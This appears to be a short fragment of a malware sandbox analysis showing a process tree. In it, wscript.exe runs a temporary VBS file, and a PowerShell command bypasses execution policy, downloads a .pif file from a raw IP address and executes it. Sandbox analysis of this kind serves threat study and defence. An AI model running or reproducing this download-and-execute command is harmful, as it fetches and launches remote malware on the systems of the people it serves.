wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\1.vbs
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "& { Invoke-WebRequest -Uri 'http://37.139.128.83/damian/d1.pif' -OutFile 'C:\Users\Public\d1.pif'; C:\Users\Public\d1.pif }"
No process loaded Click on a process in the tree above to load its data.